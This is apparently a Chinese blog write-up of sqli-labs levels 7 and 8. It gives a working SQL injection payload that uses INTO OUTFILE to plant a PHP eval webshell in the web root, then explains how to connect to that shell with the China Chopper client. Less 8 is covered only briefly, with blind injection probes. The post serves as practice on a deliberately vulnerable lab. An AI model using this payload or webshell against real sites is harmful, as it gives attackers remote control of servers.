less 7
outfile&菜刀用法
这关没什么好说的,主要讲讲菜刀用法
首先还是先讲一下这关好吧
?id=1'会报错,?id=1"则说you are in...use outfile....
后台语句是$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
所以用?id=1'))--+是可以闭合的,重点不是这里,题目说了use outfile嘛
所以payload写
?id=1')) union select 1,2,'<?php @eval($_POST["mima"])?>' into outfile "F:\\xampp5.6\\xampp\\htdocs\\sqli-labs-master\\sqli-labs-master\\Less-7\\file.php"--+
运行以后看到文件夹里面多了一个file.php文件,没错了,这个语句就是写一句话在文件里面并把它上传上去
然后就菜刀连
这里就跳到具体用法了
右键,添加看到这个页面,然后把地址,密码填进去,密码是你上传的一句话木马的值
栗子,如果上传了<?php @eval()$_POST["gg"];?>,那么密码就是gg
配置看官方文档,类别type1, 脚本类型选你上传的脚本的类型,编码php选GB2312,其他的语言还是细看官方文档好吧
菜刀连了以后就可以为所欲为.jpg了
less 8
get方法无报错回显单引号布尔盲注
这关跟less 5差不多,方法其实一样的,用回less 5的脚本就行了,只不过不同的是这关没有报错回显,如果错误的话无回显
试下?id=1'无回显,?id=1'--+返回you are in...
基本可以确认后台是select xxx from "table_name" where id = '$_GET["id"]',但是注释了报错语句所以无法回显
emmm,好像没了
1258
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
